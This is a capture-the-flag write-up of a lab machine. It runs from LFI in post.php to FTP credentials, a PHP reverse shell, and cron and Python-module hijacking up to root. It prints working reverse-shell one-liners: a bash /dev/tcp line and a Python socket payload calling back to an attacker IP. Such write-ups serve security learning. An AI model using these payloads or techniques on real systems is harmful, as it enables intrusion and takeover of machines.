Flag 1
Well, this blog was about some kind of placemat stuffs. I didn’t find any intersting in its source page, but robots.txt was very useful for flag_1.
It tells /flag_1.txt and /secret_file_do_not_read.txt was allowed for user’s t access.
I moved to flag_1.txt , and we got our first flag.
In mean time, i did nmap scan and found ftp, ssh ports are also open. Sadly, there was no anonymous login for ftp .
Flag 2
I also tried to move to /secret_file_do_not_read.txt but it was forbidden. So, i came back to main web page and visited those posts. The url was like http://10.10.189.206/post.php?post=round.php .
This seems like vulnerable to lfi . So, i tried some lfi payloads.
Boom…. guess was correct. But, there was no useful info. So, I tried to give /secret_file_do_not_read.txt to post parameter .
Woooo…. we get ftp user credentials so easily and its also telling abut where the file will be uploaded.
Now, i logged in as ftp user with those credentials and downloaded the flag to my system.
Here, I got second flag.
Flag 3
I decided to upload a php-reverse-shell and started listening in other terminal and moved to http://10.10.189.206/post.php?post=/home/ftpuser/ftp/files/php-reverse-shell.php .
And i got reverse connection and got second flag.
By searching for the flag_3 using find command i got the third flag.
Flag 4
Similar way I did for other flags , and their locations. Flag_4 was in toby user’s directory. Before moving i spwaned interactive python shell.
python3 -c 'import pty; pty.spawn("/bin/bash")'Then I did sudo -l , to see all the commands i can run as user toby.
Well, i was able to run all commands. So i switched user as toby from www-data.
here we go for fourth flag.
Flag 5
To find Flag 5, they gave hint about cronjobs and scripts directory under toby user’s directory. Well, it’s a bash script named as cow.sh , I viewed that script. Basically it was copying a cow.jpg image file from mat user’s to the tmp directory. So, if we add bash reverse shell to the cow.sh script , we can easily be gain access to the mat user.
echo '/bin/bash -c "/bin/bash -i >& /dev/tcp/my_ip/port 0>/&1"' >> file.sh
And i started listening in my localhost. ( nc )
Here, we go …Flag_5 occupied.
Flag 6
Now, for flag_6, they gave hint about python module hijaking. In mat user directory i found script directory, it consists of 2 python files named as cmd.py and will_script.py . Here, basically in will_script.py they were making call of cmd.py . And i had access to write cmd.py file not will_script.py . So, i over written that cmd.py file python reverse connection payload.
echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.8.108.69',9898));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);" > cmd.py
I started listening in my system and i executed the payload.
and here we go…. for 6th flag.
Flag 7
Now, for 7th flag they gave hint as ssh. I already knew there was ssh service from port scan. So, i searched for id_rsa using find command but there was no result. I also tried find / -type f -name *key* 2>/dev/null but it gave me very lengthy result. So i decided to check directories manually and found key in /opt/backups directory. I started python localhost ( python3 -m http.server ) and downloded that file to my pc.
The file was base64 encoded , so i decoded it and used for ssh connection. Finally, i got root …..And 7th flag.
It was really a very good room for learners…….. I hope you guyz find this useful…… Happy Hacking…….
